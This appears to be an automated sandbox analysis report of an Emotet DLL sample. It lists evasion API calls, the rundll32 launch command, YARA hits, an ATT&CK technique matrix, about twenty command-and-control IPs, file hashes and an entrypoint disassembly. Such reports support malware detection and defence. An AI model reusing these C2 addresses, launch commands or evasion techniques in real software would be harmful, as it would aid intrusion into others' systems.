Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9D69AA mov eax, dword ptr fs:[00000030h]	2_2_6E9D69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0324DE10 mov eax, dword ptr fs:[00000030h]	3_2_0324DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3DE10 mov eax, dword ptr fs:[00000030h]	5_2_00B3DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBDE10 mov eax, dword ptr fs:[00000030h]	14_2_00EBDE10

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9CED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9CED41
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9C5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9C5ABD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9C5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E9C5239
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9CED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E9CED41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9C5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E9C5ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9C5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E9C5239

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1

Jump to behavior

Source: rundll32.exe, 0000000E.00000002.817509980.0000000003370000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 0000000E.00000002.817509980.0000000003370000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000000E.00000002.817509980.0000000003370000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000000E.00000002.817509980.0000000003370000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6E9E57AC
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E9E5F10
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E9DDD93
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E9E5DE7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E9DE2F8
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E9E5A24
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E9E5A6F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E9E5B97
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E9E5B0A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E9E60E4
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E9E6017
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E9E597B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6E9E57AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6E9E5F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E9DDD93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E9E5DE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E9DE2F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E9E5A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E9E5A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E9E5B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E9E5B0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E9E60E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E9E6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E9E597B

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9C5916 cpuid

0_2_6E9C5916

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9C5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E9C5C3C

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.3304250.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.d341f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3464320.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.d341f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.32a6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.e45298.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3304250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3464320.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.32a6388.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.e45298.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.352402052.000000000344A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.415487729.000000000117D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.413760673.0000000000D1A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.426884632.000000000328A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.415304095.00000000032EA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.816631755.0000000000C67000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.352283785.0000000000E2A000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Application Shimming1	Process Injection112	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Application Shimming1	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Information Discovery134	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wNjqkrm8pH.dll	24%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.1040000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.cf0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.b20000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.ea0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.e45298.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.3230000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.1030000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.3230000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000019.00000002.631623148.0000025AA8CEB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000019.00000003.607542266.0000025AA9575000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.607594577.0000025AA9599000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	524862
Start date:	19.11.2021
Start time:	01:03:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	wNjqkrm8pH (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@27/0@0/21
EGA Information:	Failed
HDC Information:	Successful, ratio: 17.6% (good quality ratio 16%) Quality average: 69.9% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 86% Number of executed functions: 62 Number of non-executed functions: 277
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:06:37	API Interceptor	8x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
196.44.98.190	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
78.46.73.125	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	5YO8hZg21O.dll	Get hash	malicious	Browse	78.47.204.80
	dUGnMYeP1C.dll	Get hash	malicious	Browse	78.47.204.80
	yFAXc9z51V.dll	Get hash	malicious	Browse	78.47.204.80
	9fC0as7YLE.dll	Get hash	malicious	Browse	78.47.204.80
	FIyE6huzxV.dll	Get hash	malicious	Browse	78.47.204.80
	V0gZWRXv8d.dll	Get hash	malicious	Browse	78.47.204.80
	t5EuQW2GUF.dll	Get hash	malicious	Browse	78.47.204.80
	uh1WyesPlh.dll	Get hash	malicious	Browse	78.47.204.80
	8rryPzJR1p.dll	Get hash	malicious	Browse	78.47.204.80
	a65FgjVus4.dll	Get hash	malicious	Browse	78.47.204.80
	bWjYh6H8wk.dll	Get hash	malicious	Browse	78.47.204.80
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	78.47.204.80
	eyPPiz3W6u.dll	Get hash	malicious	Browse	78.47.204.80
	HjYSwxqyUn.dll	Get hash	malicious	Browse	78.47.204.80
	f47YPsvRI3.dll	Get hash	malicious	Browse	78.47.204.80
	2n64VXT08V.dll	Get hash	malicious	Browse	78.47.204.80
	qUr4bXsweR.dll	Get hash	malicious	Browse	78.47.204.80
	52O6evfqQT.dll	Get hash	malicious	Browse	78.47.204.80
	ONEitXKvz6.dll	Get hash	malicious	Browse	78.47.204.80
	F2433DFBA69148A0C3A5A5951D360B6C3C045090DE06F.exe	Get hash	malicious	Browse	5.9.162.45
AS-CHOOPAUS	5YO8hZg21O.dll	Get hash	malicious	Browse	66.42.57.149
	dUGnMYeP1C.dll	Get hash	malicious	Browse	66.42.57.149
	yFAXc9z51V.dll	Get hash	malicious	Browse	66.42.57.149
	9fC0as7YLE.dll	Get hash	malicious	Browse	66.42.57.149
	FIyE6huzxV.dll	Get hash	malicious	Browse	66.42.57.149
	V0gZWRXv8d.dll	Get hash	malicious	Browse	66.42.57.149
	t5EuQW2GUF.dll	Get hash	malicious	Browse	66.42.57.149
	uh1WyesPlh.dll	Get hash	malicious	Browse	66.42.57.149
	8rryPzJR1p.dll	Get hash	malicious	Browse	66.42.57.149
	a65FgjVus4.dll	Get hash	malicious	Browse	66.42.57.149
	bWjYh6H8wk.dll	Get hash	malicious	Browse	66.42.57.149
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	66.42.57.149
	eyPPiz3W6u.dll	Get hash	malicious	Browse	66.42.57.149
	HjYSwxqyUn.dll	Get hash	malicious	Browse	66.42.57.149
	f47YPsvRI3.dll	Get hash	malicious	Browse	66.42.57.149
	2n64VXT08V.dll	Get hash	malicious	Browse	66.42.57.149
	qUr4bXsweR.dll	Get hash	malicious	Browse	66.42.57.149
	52O6evfqQT.dll	Get hash	malicious	Browse	66.42.57.149
	ONEitXKvz6.dll	Get hash	malicious	Browse	66.42.57.149
	F2433DFBA69148A0C3A5A5951D360B6C3C045090DE06F.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	5YO8hZg21O.dll	Get hash	malicious	Browse	196.44.98.190
	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190
	eyPPiz3W6u.dll	Get hash	malicious	Browse	196.44.98.190
	HjYSwxqyUn.dll	Get hash	malicious	Browse	196.44.98.190
	f47YPsvRI3.dll	Get hash	malicious	Browse	196.44.98.190
	2n64VXT08V.dll	Get hash	malicious	Browse	196.44.98.190
	qUr4bXsweR.dll	Get hash	malicious	Browse	196.44.98.190
	52O6evfqQT.dll	Get hash	malicious	Browse	196.44.98.190
	ONEitXKvz6.dll	Get hash	malicious	Browse	196.44.98.190
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	5YO8hZg21O.dll	Get hash	malicious	Browse	51.178.61.60
	dUGnMYeP1C.dll	Get hash	malicious	Browse	51.178.61.60
	yFAXc9z51V.dll	Get hash	malicious	Browse	51.178.61.60
	9fC0as7YLE.dll	Get hash	malicious	Browse	51.178.61.60
	FIyE6huzxV.dll	Get hash	malicious	Browse	51.178.61.60
	V0gZWRXv8d.dll	Get hash	malicious	Browse	51.178.61.60
	t5EuQW2GUF.dll	Get hash	malicious	Browse	51.178.61.60
	uh1WyesPlh.dll	Get hash	malicious	Browse	51.178.61.60
	8rryPzJR1p.dll	Get hash	malicious	Browse	51.178.61.60
	a65FgjVus4.dll	Get hash	malicious	Browse	51.178.61.60
	bWjYh6H8wk.dll	Get hash	malicious	Browse	51.178.61.60
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	51.178.61.60
	eyPPiz3W6u.dll	Get hash	malicious	Browse	51.178.61.60
	02D6463C8D80183F843D874AB427C11FC47B6B9CE4726.exe	Get hash	malicious	Browse	51.178.61.60
	HjYSwxqyUn.dll	Get hash	malicious	Browse	51.178.61.60
	f47YPsvRI3.dll	Get hash	malicious	Browse	51.178.61.60
	2n64VXT08V.dll	Get hash	malicious	Browse	51.178.61.60
	qUr4bXsweR.dll	Get hash	malicious	Browse	51.178.61.60
	52O6evfqQT.dll	Get hash	malicious	Browse	51.178.61.60
	ONEitXKvz6.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.178846163511901
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Clipper DOS Executable (2020/12) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wNjqkrm8pH.dll
File size:	485376
MD5:	699b39c805f6a366707eb9a0e580bc0d
SHA1:	04489a4c9d50b62a9ff16f5baa67f568b2eb46ed
SHA256:	142d330305cf2bba895b000b9c7c2da6c6b38cb728d3fb347da8dd9f0bed4845
SHA512:	840b88d0d294b84b46e15eb6f6172171e370cc91d1dce89daa8d5dd5b9133683797b382fc61545c9fb73d4278819c48322c8063ccf6711611fc0442ae79ba31f
SSDEEP:	12288:bdv8jkvzqZvv2wLBymTi12yD88kYwZ1h1:b2Zvv2c1Ti1v0Z1h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10015826
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61964C08 [Thu Nov 18 12:50:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	261bae8b02d2e7bf979e55d76b9dc786

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FF1C8DD9A27h
call 00007FF1C8DD9E7Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FF1C8DD98D8h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF1C8DC586Eh
mov dword ptr [esi], 1003B3E8h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B3F0h
mov dword ptr [ecx], 1003B3E8h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF1C8DC583Bh
mov dword ptr [esi], 1003B404h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
